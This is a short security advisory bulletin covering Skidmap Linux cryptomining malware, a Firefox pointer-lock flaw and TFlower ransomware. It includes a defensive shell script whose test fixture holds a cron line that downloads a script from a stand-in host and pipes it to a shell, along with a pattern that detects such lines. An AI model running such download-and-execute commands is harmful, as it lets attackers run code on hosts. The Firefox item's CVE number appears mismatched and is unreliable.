Skidmap Malware

A form of malware stumbled upon by researchers makes use of rootkits to bury itself undetected in Linux systems for the purpose of cryptocurrency mining.

Once a vulnerable Linux system has been found, Skidmap installs itself via crontab, a time-based job scheduler.

An installation script downloads the main Trojan payload, which then sets Security-Enhanced Linux (SELinux) modules to a ‘permissive’ state to reduce the overall security level of the machine.

Source: ZDNet

How do you protect yourself?

Proper security measures must be in place to defend against Skidmap Malware and similar threats. Having proper up-to-date endpoint security provides a cross-generational blend of threat defense techniques to protect systems from malware.
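
As a concrete check for the two behaviours described above (installation via crontab and SELinux set to permissive), the following shell script is an added example, not taken from the cited report. The function names, the cron heuristic and the fixture contents are assumptions of this example.

```shell
#!/bin/sh
# Added example: audit copies of (or live) SELinux and cron files.

# Print the mode set by SELINUX= in a config file (empty if absent or unreadable).
selinux_config_mode() {
    [ -r "$1" ] || return 0
    sed -n 's/^[[:space:]]*SELINUX=[[:space:]]*\([A-Za-z]*\).*/\1/p' "$1" | tail -n 1
}

# Print file:line:entry for uncommented cron lines that pipe a download into a
# shell. This heuristic is an assumption of the example, not a Skidmap signature.
suspicious_cron_lines() {
    # /dev/null forces file names in the output and avoids reading stdin.
    grep -nE '^[[:space:]]*[^#[:space:]][^#]*(curl|wget)[^|#]*\|[[:space:]]*(ba|da|z)?sh([[:space:]]|$)' "$@" /dev/null 2>/dev/null
}

# audit_host SELINUX_CONFIG [CRON_FILE...]: prints findings, exits 1 if any.
audit_host() (
    cfg=$1; shift
    status=0
    mode=$(selinux_config_mode "$cfg")
    case "$mode" in
        enforcing|"") ;;  # enforcing, or no SELINUX= line to judge
        *) echo "FINDING selinux: SELINUX=$mode in $cfg"; status=1 ;;
    esac
    hits=$(suspicious_cron_lines "$@" || true)
    if [ -n "$hits" ]; then
        printf '%s\n' "$hits" | sed 's/^/FINDING cron: /'
        status=1
    fi
    exit "$status"
)

# Dry run on constructed fixtures; expected to report two findings.
demo() (
    d=$(mktemp -d) || exit 1
    printf 'SELINUX=permissive\nSELINUXTYPE=targeted\n' > "$d/selinux.conf"
    printf '# constructed\n*/10 * * * * root curl -fsS http://example.invalid/i.sh | sh\n' > "$d/cron"
    rc=0; audit_host "$d/selinux.conf" "$d/cron" || rc=$?
    rm -rf "$d"; exit "$rc"
)

case "${1:-}" in
    --demo) demo ;;
    --live) audit_host /etc/selinux/config /etc/crontab /etc/cron.d/* \
                /var/spool/cron/* /var/spool/cron/crontabs/* ;;
esac
```

The config file shows only the boot-time setting; on a live host, `getenforce` reports the mode currently in effect and should be checked as well.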

CVE 2019-11745

Mozilla has released security updates for Firefox. When the pointer lock is enabled by a website through requestPointerLock(), no user notification is given. This could allow a malicious website to hijack the mouse pointer and confuse users.

Source: Mozilla

How do you protect yourself?

Update Firefox to Firefox 69.0.1.

TFlower Ransomware

The latest ransomware targeting corporate environments is called TFlower. It is being installed on corporate networks after attackers hack into exposed Remote Desktop services.

Once the attackers gain access to the machine, they will infect the local machine or may attempt to traverse the network through tools such as PowerShell Empire, PsExec, etc.

Source: BleepingComputer

How do you protect yourself?

Proper security measures must be in place to defend against TFlower Ransomware and similar threats. Ensure your systems have the latest patches installed. Having proper up-to-date endpoint security provides a cross-generational blend of threat defense techniques to protect systems from malware.